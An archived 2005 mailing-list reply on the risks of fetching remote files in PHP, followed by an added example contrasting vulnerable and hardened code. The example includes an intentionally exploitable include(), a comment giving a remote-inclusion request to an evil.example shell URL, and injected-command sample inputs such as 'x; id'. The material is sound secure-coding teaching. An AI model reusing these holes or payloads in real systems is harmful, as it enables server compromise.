[Sussex] Getting files from a remote web server in a PHP script

Jon Fautley jfautley at redhat.com
Mon Oct 24 09:15:07 UTC 2005


Mark Harrison (Groups) wrote:
> On Sat, 2005-10-22 at 19:46 +0100, Steve Dobson wrote:
> 
>>
>>I need to write a little script to fetch HTML files from a remote
>>web server from within a PHP script.  Now I could use system()
>>to call wget and do it that way.
>>
>>But I was wondering is there a better way (more direct) of getting 
>>the remote data?
> 
> 
> fopen supports http as if it were a file system, so you can do stuff
> like:
> 
> $myfile = fopen("http://www.remoteserver.com/mydirectory/myfile", "r");

I may be totally wrong here, but I'll say it anyway.

This is a security risk unless you are VERY VERY careful in what you do.
Enabling allow_url_fopen enables remote file inclusion for most PHP 
functions that deal with files.

Imagine, if you will, that Steve is taking the data from a remote 
server, then processing it and passing that data to a command 
line/system() call for further processing - if the remote server is 
compromised then I'm sure you can all see what happens.

Another, more serious threat, is that you could assist a 
cross-site scripting attack. If someone manages to inject arbitrary PHP 
into your scripts (and most of these attacks are done automatically), 
then it's possible to randomly open remote files, and have that PHP run 
on your system. This is the most common way of compromising a PHP server.

I apologise if the above made as much sense as a cow standing on the 
moon with a pair of clogs and a fedora on - it's Monday and I'm tired, 
but I hope you all see what I'm trying to say :)

Regards,

Jon
-- 
Jon Fautley <jfautley at redhat.com>     direct: +44 1483 739615
  Presales Technical Consultant        office: +44 1483 300169
  Red Hat UK                           mobile: +44 7841 558683
  10 Alan Turing Road, Surrey Research Park, Guildford GU2 7YF
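The two failure modes Jon describes (remote input reaching include(), and fetched content reaching system()), each shown beside a safer variant, as an added example that is not code from the original thread. The function names, the page map and the sample "hostile" body are constructed for illustration; the fetch helper assumes PHP 7.1 or later with the curl extension loaded. One caveat worth knowing: before PHP 5.2, allow_url_fopen alone decided whether include/require could fetch URLs; from 5.2 onward that is gated separately by allow_url_include.

```php
<?php
// Added example, not code from the original mailing-list thread. Names and
// sample strings below are assumptions made for illustration only.

// php.ini settings behind the behaviour Jon describes:
//   allow_url_fopen   = Off   ; fopen()/file_get_contents() refuse URLs
//   allow_url_include = Off   ; include/require refuse URLs (PHP >= 5.2;
//                             ; before 5.2, allow_url_fopen covered this too)

// ---- Failure mode 1: request input reaches include() ----------------------

// Vulnerable: with URL wrappers enabled for include, a request such as
// ?page=http://evil.example/shell makes this script fetch and execute
// whatever that server returns.
function vulnerableInclude(string $page): void
{
    include $page . '.php';
}

// Hardened: the untrusted name only selects from a fixed map of local files,
// so neither a URL nor a path such as ../../etc/passwd can reach include().
function resolvePage(string $page): ?string
{
    static $pages = [
        'home'  => __DIR__ . '/pages/home.php',   // assumed local files
        'about' => __DIR__ . '/pages/about.php',
    ];
    return $pages[$page] ?? null;
}

function safeInclude(string $page): void
{
    $file = resolvePage($page);
    if ($file === null) {
        header('HTTP/1.0 404 Not Found');
        return;
    }
    include $file;
}

// ---- Failure mode 2: fetched content reaches a shell -----------------------

// Vulnerable: the remote body is spliced unquoted into a command line, so a
// compromised server that returns "x; id" gets "id" run on this host.
function vulnerableCommand(string $remoteBody): string
{
    return 'echo ' . $remoteBody . ' | wc -w';
}

// Safer: escapeshellarg() turns the body into one single-quoted argument.
function safeCommand(string $remoteBody): string
{
    return 'echo ' . escapeshellarg($remoteBody) . ' | wc -w';
}

// Best: skip the shell entirely and process the data in PHP.
function countWordsInPhp(string $remoteBody): int
{
    return str_word_count(strip_tags($remoteBody));
}

// Deliberate fetching without turning on URL wrappers for every file
// function: cURL, restricted to http/https, no redirects, short timeout.
// Returns null on any failure so an error page never flows onward as "data".
function fetchRemote(string $url): ?string
{
    $ch = curl_init($url);
    curl_setopt_array($ch, [
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_FOLLOWLOCATION => false,
        CURLOPT_TIMEOUT        => 5,
        CURLOPT_PROTOCOLS      => CURLPROTO_HTTP | CURLPROTO_HTTPS,
    ]);
    $body = curl_exec($ch);
    $ok   = $body !== false && curl_getinfo($ch, CURLINFO_HTTP_CODE) === 200;
    curl_close($ch);
    return $ok ? (string) $body : null;
}

// ---- Demo on a constructed "remote" body (no network needed) ---------------
$hostile = "hello world; id";   // constructed sample of a compromised response

echo vulnerableCommand($hostile), "\n";   // "; id" would run as a command
echo safeCommand($hostile), "\n";         // whole body is one quoted argument
echo countWordsInPhp($hostile), "\n";     // no shell involved at all

var_dump(resolvePage('about'));                      // a local path
var_dump(resolvePage('http://evil.example/shell'));  // rejected
```

Run it from the command line with `php example.php`; the demo section never touches the network or a shell, it only shows the command strings that would be built. If a shell step is genuinely unavoidable, pass the fetched data on stdin rather than on the command line, and keep allow_url_fopen and allow_url_include off unless a specific script needs them.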




